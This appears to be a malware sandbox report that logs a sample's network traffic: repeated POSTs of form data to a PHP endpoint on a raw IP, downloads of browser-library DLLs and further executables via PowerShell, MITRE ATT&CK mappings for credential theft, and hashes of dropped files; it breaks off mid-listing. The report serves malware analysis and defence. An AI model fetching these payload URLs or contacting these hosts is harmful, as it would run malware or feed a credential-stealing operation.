Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "1f3950-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
GET

http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

GET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
GET

http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

GET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
POST

http://185.172.128.150/c698e1bc8a2f5e6d.php

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJE
Host: 185.172.128.150
Content-Length: 827
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://185.172.128.150/c698e1bc8a2f5e6d.php

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIE
Host: 185.172.128.150
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://185.172.128.150/c698e1bc8a2f5e6d.php

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHID
Host: 185.172.128.150
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://185.172.128.150/c698e1bc8a2f5e6d.php

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGCAKKKEGCAKJKFIIEGI
Host: 185.172.128.150
Content-Length: 15735
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://185.172.128.150/c698e1bc8a2f5e6d.php

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJK
Host: 185.172.128.150
Content-Length: 15731
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://185.172.128.150/c698e1bc8a2f5e6d.php

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFH
Host: 185.172.128.150
Content-Length: 86783
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://185.172.128.150/c698e1bc8a2f5e6d.php

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAE
Host: 185.172.128.150
Content-Length: 270
Connection: Keep-Alive
Cache-Control: no-cache
DNS

150.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

150.128.172.185.in-addr.arpa

IN PTR

Response
DNS

150.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

150.128.172.185.in-addr.arpa

IN PTR
DNS

svc.iolo.com

u1f4.1.exe

Remote address:

8.8.8.8:53

Request

svc.iolo.com

IN A

Response

svc.iolo.com

IN A

20.157.87.45
POST

http://svc.iolo.com/__svc/sbv/DownloadManager.ashx

u1f4.1.exe

Remote address:

20.157.87.45:80

Request

POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

Response

HTTP/1.1 200 OK

cache-control: private
content-length: 256
content-type: text/html; charset=utf-8
x-whom: Ioloweb7
date: Thu, 09 May 2024 22:59:46 GMT
set-cookie: SERVERID=svc7; path=/
connection: close
DNS

45.87.157.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

45.87.157.20.in-addr.arpa

IN PTR

Response
DNS

download.iolo.net

Remote address:

8.8.8.8:53

Request

download.iolo.net

IN A

Response

download.iolo.net

IN CNAME

iolo0.b-cdn.net

iolo0.b-cdn.net

IN A

185.93.2.245
HEAD

https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

Remote address:

185.93.2.245:443

Request

HEAD /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:49 GMT
Content-Type: application/octet-stream
Content-Length: 58919336
Connection: keep-alive
Server: BunnyCDN-FR1-947
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Mon, 29 Apr 2024 18:38:19 GMT
CDN-StorageServer: DE-664
CDN-FileServer: 594
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/06/2024 22:02:11
CDN-EdgeStorageId: 1187
CDN-Status: 200
CDN-RequestId: c063f6e0eb64b311fc11b1f1064672ef
CDN-Cache: HIT
Accept-Ranges: bytes
GET

https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

Remote address:

185.93.2.245:443

Request

GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 29 Apr 2024 18:38:19 GMT
Range: bytes=0-11199
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net

Response

HTTP/1.1 206 Partial Content

Date: Thu, 09 May 2024 22:59:49 GMT
Content-Type: application/octet-stream
Content-Length: 11200
Connection: keep-alive
Server: BunnyCDN-FR1-947
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Mon, 29 Apr 2024 18:38:19 GMT
CDN-StorageServer: DE-664
CDN-FileServer: 594
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/06/2024 22:02:11
CDN-EdgeStorageId: 1187
CDN-Status: 200
CDN-RequestId: d27eec3b6244dbf13d8b1547eeac4ca3
CDN-Cache: HIT
Content-Range: bytes 0-11199/58919336
GET

https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

Remote address:

185.93.2.245:443

Request

GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 29 Apr 2024 18:38:19 GMT
Range: bytes=11200-372489
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net

Response

HTTP/1.1 206 Partial Content

Date: Thu, 09 May 2024 22:59:49 GMT
Content-Type: application/octet-stream
Content-Length: 361290
Connection: keep-alive
Server: BunnyCDN-FR1-947
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Mon, 29 Apr 2024 18:38:19 GMT
CDN-StorageServer: DE-664
CDN-FileServer: 594
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/06/2024 22:02:11
CDN-EdgeStorageId: 1187
CDN-Status: 200
CDN-RequestId: d07633ae80ca340fd824b372d5038dc3
CDN-Cache: HIT
Content-Range: bytes 11200-372489/58919336
GET

https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

Remote address:

185.93.2.245:443

Request

GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 29 Apr 2024 18:38:19 GMT
Range: bytes=372490-2473012
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net

Response

HTTP/1.1 206 Partial Content

Date: Thu, 09 May 2024 22:59:50 GMT
Content-Type: application/octet-stream
Content-Length: 2100523
Connection: keep-alive
Server: BunnyCDN-FR1-947
CDN-PullZone: 1654350
CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
CDN-RequestCountryCode: GB
Cache-Control: public, max-age=259200
Last-Modified: Mon, 29 Apr 2024 18:38:19 GMT
CDN-StorageServer: DE-664
CDN-FileServer: 594
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 206
CDN-CachedAt: 05/06/2024 22:02:11
CDN-EdgeStorageId: 1187
CDN-Status: 200
CDN-RequestId: 0020fe9d4059f52d590c69bcd657b720
CDN-Cache: HIT
Content-Range: bytes 372490-2473012/58919336
GET

https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

Remote address:

185.93.2.245:443

Request

GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 29 Apr 2024 18:38:19 GMT
Range: bytes=2473013-15937903
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
GET

https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

Remote address:

185.93.2.245:443

Request

GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 29 Apr 2024 18:38:19 GMT
Range: bytes=15937904-40919147
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
GET

https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

Remote address:

185.93.2.245:443

Request

GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 29 Apr 2024 18:38:19 GMT
Range: bytes=40919148-58919335
User-Agent: Microsoft BITS/7.8
Host: download.iolo.net
DNS

245.2.93.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

245.2.93.185.in-addr.arpa

IN PTR

Response

245.2.93.185.in-addr.arpa

IN PTR

185-93-2-245 bunnyinfranet
POST

http://svc.iolo.com/__svc/sbv/DownloadManager.ashx

u1f4.1.exe

Remote address:

20.157.87.45:80

Request

POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

Response

HTTP/1.1 200 OK

cache-control: private
content-length: 192
content-type: text/html; charset=utf-8
x-whom: Ioloweb5
date: Thu, 09 May 2024 22:59:55 GMT
set-cookie: SERVERID=svc5; path=/
connection: close
DNS

westus2-2.in.applicationinsights.azure.com

SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Remote address:

8.8.8.8:53

Request

westus2-2.in.applicationinsights.azure.com

IN A

Response

westus2-2.in.applicationinsights.azure.com

IN CNAME

westus2-2.in.ai.monitor.azure.com

westus2-2.in.ai.monitor.azure.com

IN CNAME

westus2-2.in.ai.privatelink.monitor.azure.com

westus2-2.in.ai.privatelink.monitor.azure.com

IN CNAME

gig-ai-prod-westus2-0.trafficmanager.net

gig-ai-prod-westus2-0.trafficmanager.net

IN CNAME

gig-ai-prod-wus2-01-app-v4-tag.westus2.cloudapp.azure.com

gig-ai-prod-wus2-01-app-v4-tag.westus2.cloudapp.azure.com

IN A

20.9.155.148
POST

https://westus2-2.in.applicationinsights.azure.com/v2/track

SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Remote address:

20.9.155.148:443

Request

POST /v2/track HTTP/1.1
Content-Type: application/x-json-stream
Content-Encoding: gzip
Host: westus2-2.in.applicationinsights.azure.com
Content-Length: 854
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Transfer-Encoding: chunked
Content-Type: application/json; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Thu, 09 May 2024 23:00:03 GMT
DNS

148.155.9.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

148.155.9.20.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

213.143.182.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

213.143.182.52.in-addr.arpa

IN PTR

Response

13.249.247.72:443

https://d295fdouc92v9n.cloudfront.net/load/load.php?c=1000

tls, http

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe

1.3kB
7.8kB
15
12

HTTP Request

GET https://d295fdouc92v9n.cloudfront.net/load/load.php?c=1000

HTTP Response

200
18.245.218.14:80

http://crl.rootca1.amazontrust.com/rootca1.crl

http

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe

548 B
1.4kB
6
4

HTTP Request

GET http://crl.rootca1.amazontrust.com/rootca1.crl

HTTP Response

200
108.156.32.179:443

https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000

tls, http

powershell.exe

992 B
6.6kB
10
11

HTTP Request

GET https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000

HTTP Response

200
108.156.32.179:443

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000

tls, http

powershell.exe

1.0kB
6.7kB
11
11

HTTP Request

GET https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000

HTTP Response

302
185.172.128.59:80

http://185.172.128.59/ISetup1.exe

http

powershell.exe

8.7kB
407.6kB
181
307

HTTP Request

GET http://185.172.128.59/ISetup1.exe

HTTP Response

200
108.156.32.179:443

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000

tls, http

powershell.exe

849 B
6.5kB
9
10

HTTP Request

GET https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000

HTTP Response

302
94.156.35.76:80

http://240429000936002.mjt.kqri92.top/f/fvgbm0428902.txt

http

powershell.exe

538 B
336 B
6
3

HTTP Request

GET http://240429000936002.mjt.kqri92.top/f/fvgbm0428902.txt

HTTP Response

404
185.172.128.90:80

http://185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=2838

http

i1.exe

638 B
280 B
5
3

HTTP Request

GET http://185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=2838

HTTP Response

200
185.172.128.228:80

http://185.172.128.228/ping.php?substr=one

http

i1.exe

604 B
279 B
5
3

HTTP Request

GET http://185.172.128.228/ping.php?substr=one

HTTP Response

200
185.172.128.59:80

http://185.172.128.59/syncUpd.exe

http

i1.exe

4.1kB
218.4kB
86
166

HTTP Request

GET http://185.172.128.59/syncUpd.exe

HTTP Response

200
185.172.128.228:80

http://185.172.128.228/BroomSetup.exe

http

i1.exe

135.0kB
5.0MB
2491
3758

HTTP Request

GET http://185.172.128.228/BroomSetup.exe

HTTP Response

200
185.172.128.150:80

http://185.172.128.150/c698e1bc8a2f5e6d.php

http

u1f4.0.exe

331.8kB
5.2MB
4006
3933

HTTP Request

POST http://185.172.128.150/c698e1bc8a2f5e6d.php

HTTP Response

200

HTTP Request

POST http://185.172.128.150/c698e1bc8a2f5e6d.php

HTTP Response

200

HTTP Request

POST http://185.172.128.150/c698e1bc8a2f5e6d.php

HTTP Response

200

HTTP Request

POST http://185.172.128.150/c698e1bc8a2f5e6d.php

HTTP Response

200

HTTP Request

GET http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll

HTTP Response

200

HTTP Request

POST http://185.172.128.150/c698e1bc8a2f5e6d.php

HTTP Response

200

HTTP Request

GET http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll

HTTP Request

GET http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll

HTTP Request

POST http://185.172.128.150/c698e1bc8a2f5e6d.php

HTTP Request

POST http://185.172.128.150/c698e1bc8a2f5e6d.php

HTTP Request

POST http://185.172.128.150/c698e1bc8a2f5e6d.php

HTTP Request

POST http://185.172.128.150/c698e1bc8a2f5e6d.php

HTTP Request

POST http://185.172.128.150/c698e1bc8a2f5e6d.php

HTTP Request

POST http://185.172.128.150/c698e1bc8a2f5e6d.php

HTTP Request

POST http://185.172.128.150/c698e1bc8a2f5e6d.php
20.157.87.45:80

http://svc.iolo.com/__svc/sbv/DownloadManager.ashx

http

u1f4.1.exe

2.0kB
745 B
8
6

HTTP Request

POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashx

HTTP Response

200
185.93.2.245:443

https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

tls, http

1.3MB
24.3MB
18154
17445

HTTP Request

HEAD https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

HTTP Response

200

HTTP Request

GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

HTTP Response

206

HTTP Request

GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

HTTP Response

206

HTTP Request

GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

HTTP Response

206

HTTP Request

GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

HTTP Request

GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

HTTP Request

GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe
20.157.87.45:80

http://svc.iolo.com/__svc/sbv/DownloadManager.ashx

http

u1f4.1.exe

974 B
657 B
9
6

HTTP Request

POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashx

HTTP Response

200
20.9.155.148:443

https://westus2-2.in.applicationinsights.azure.com/v2/track

tls, http

SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

2.0kB
5.2kB
12
10

HTTP Request

POST https://westus2-2.in.applicationinsights.azure.com/v2/track

HTTP Response

200
52.142.223.178:80

46 B
1

8.8.8.8:53

d295fdouc92v9n.cloudfront.net

dns

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe

75 B
139 B
1
1

DNS Request

d295fdouc92v9n.cloudfront.net

DNS Response

13.249.247.72

13.249.247.45

13.249.247.126

13.249.247.88
8.8.8.8:53

72.247.249.13.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

72.247.249.13.in-addr.arpa
8.8.8.8:53

12.178.204.143.in-addr.arpa

dns

73 B
131 B
1
1

DNS Request

12.178.204.143.in-addr.arpa
8.8.8.8:53

79.190.18.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

79.190.18.2.in-addr.arpa
8.8.8.8:53

113.216.138.108.in-addr.arpa

dns

296 B
133 B
4
1

DNS Request

113.216.138.108.in-addr.arpa

DNS Request

113.216.138.108.in-addr.arpa

DNS Request

113.216.138.108.in-addr.arpa

DNS Request

113.216.138.108.in-addr.arpa
8.8.8.8:53

crl.rootca1.amazontrust.com

dns

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe

146 B
137 B
2
1

DNS Request

crl.rootca1.amazontrust.com

DNS Request

crl.rootca1.amazontrust.com

DNS Response

18.245.218.14

18.245.218.52

18.245.218.88

18.245.218.8
8.8.8.8:53

14.218.245.18.in-addr.arpa

dns

72 B
128 B
1
1

DNS Request

14.218.245.18.in-addr.arpa
8.8.8.8:53

d2iv78ooxaijb6.cloudfront.net

dns

powershell.exe

150 B
139 B
2
1

DNS Request

d2iv78ooxaijb6.cloudfront.net

DNS Request

d2iv78ooxaijb6.cloudfront.net

DNS Response

108.156.32.179

108.156.32.36

108.156.32.207

108.156.32.197
8.8.8.8:53

179.32.156.108.in-addr.arpa

dns

146 B
131 B
2
1

DNS Request

179.32.156.108.in-addr.arpa

DNS Request

179.32.156.108.in-addr.arpa
8.8.8.8:53

59.128.172.185.in-addr.arpa

dns

73 B
73 B
1
1

DNS Request

59.128.172.185.in-addr.arpa
8.8.8.8:53

240429000936002.mjt.kqri92.top

dns

powershell.exe

76 B
92 B
1
1

DNS Request

240429000936002.mjt.kqri92.top

DNS Response

94.156.35.76
8.8.8.8:53

76.35.156.94.in-addr.arpa

dns

71 B
122 B
1
1

DNS Request

76.35.156.94.in-addr.arpa
8.8.8.8:53

90.128.172.185.in-addr.arpa

dns

146 B
73 B
2
1

DNS Request

90.128.172.185.in-addr.arpa

DNS Request

90.128.172.185.in-addr.arpa
8.8.8.8:53

228.128.172.185.in-addr.arpa

dns

74 B
74 B
1
1

DNS Request

228.128.172.185.in-addr.arpa
8.8.8.8:53

150.128.172.185.in-addr.arpa

dns

148 B
74 B
2
1

DNS Request

150.128.172.185.in-addr.arpa

DNS Request

150.128.172.185.in-addr.arpa
8.8.8.8:53

svc.iolo.com

dns

u1f4.1.exe

58 B
74 B
1
1

DNS Request

svc.iolo.com

DNS Response

20.157.87.45
8.8.8.8:53

45.87.157.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

45.87.157.20.in-addr.arpa
8.8.8.8:53

download.iolo.net

dns

63 B
105 B
1
1

DNS Request

download.iolo.net

DNS Response

185.93.2.245
8.8.8.8:53

245.2.93.185.in-addr.arpa

dns

71 B
112 B
1
1

DNS Request

245.2.93.185.in-addr.arpa
8.8.8.8:53

westus2-2.in.applicationinsights.azure.com

dns

SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

88 B
300 B
1
1

DNS Request

westus2-2.in.applicationinsights.azure.com

DNS Response

20.9.155.148
8.8.8.8:53

148.155.9.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

148.155.9.20.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

213.143.182.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

213.143.182.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
66382a4ca6c4dcf75ce41417d44be93e

SHA1
8132cbef1c12f8a89a68a6153ade4286bf130812

SHA256
a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56

SHA512
2bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
bd07a04ff703b68279e1de431753ec52

SHA1
07c067c097858aab61a993b4121ccbd284a57380

SHA256
a8a4865c68ba2135f6566511361a378549b734a7b481330c5b8c74fb100c492f

SHA512
ab36b392a08825ce6852c209bc7490ee7c7ef8d2a4c42fde0bf4c61856962626b8edce9b36e810752c5df2ffa7a9e7e2b0880ba25fc6c5f881b166c97b60eea0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
dc5d733037418043497b2c99124f132b

SHA1
5fe601c81ebc02660bd94d0c7c21f0daeea4e794

SHA256
757e1e1e4a6c6a62c3a71de6a32ba6023d3955b705ac11e0e7aec6e776ebc3a6

SHA512
0691ee1f24cee85afc59859c2c7b38cfbb8e3fb86afe26100ae6ed66d6128e858ad07a22763046e66dcbfb8b4cf50020c00500a2950185a743f2d9bf3b88bfab

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wiipjhxh.ndl.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\i1.exe

Filesize
384KB

MD5
0f39626443b9a5ecbdac24c96e12728a

SHA1
04c402e550534f0871471f5b80fc5723f283f25c

SHA256
fab860ca07692e3f3f2c438a9faf142288fdbcbb43edf24e8b3b88683a529477

SHA512
9b74eea35b9ed7ea5e286ec29a676407f72a63c3d90c22616d73d0626a0cf656d9e1aaafd8c07021c38c8bf9cc75cd1a6b6ca4f7198f07c8794aad1d4bf618e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
3KB

MD5
31ac12b5051f61d39a941b58d49d3e4c

SHA1
fb365272f12ef2f4dcbc77695a4ce3996929a27d

SHA256
fb309125d53f8d7caebb0d1c75fe4aeee34afbd4cbd934544e2bd64cd167a5f5

SHA512
2c2328d147d4bbddfcb36e868b6362d56312b4d35a0b0a74eced0b7797d88da3448152a52b0dc4df4ed38d48b625ce36d0e44faeeaa4846a37c9d12a1b8f865b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsd5B9E.tmp\app.bat

Filesize
735B

MD5
f32d05160acf8325e9a09f09f80d16f4

SHA1
46e159b71e6ef99076c4002e1fda134e1d0a86c9

SHA256
da8f4f45b105538f0063ece220b69455b15c8e680099c02221c093ecb794ae37

SHA512
147c870edd09fa3f6cd93caae809b5d66fecc759e3cfee4e47dc487786edc760989fdb23310b4284e63871fe1b1d805e949601f54bfc93ff80e2e097a989879b

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1f4.0.exe

Filesize
206KB

MD5
0917be53327ea132956255dcab650a82

SHA1
b60818917f645a8a9af3b530e3ae37c1f002be2f

SHA256
211c34660898480e0777c6ef6f61bf2111f6550e00b40cab859543d567dc455a

SHA512
a72acc24ba813d983bbf2ecab7929d0aab4e25637ae43e85b973a5105429bd15c061415fd855737620caaf81b456b2d6ba57f85566245efbe5f8b5db5560932a

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1f4.1.exe

Filesize
4.6MB

MD5
397926927bca55be4a77839b1c44de6e

SHA1
e10f3434ef3021c399dbba047832f02b3c898dbd

SHA256
4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

SHA512
cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Download Submit
\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
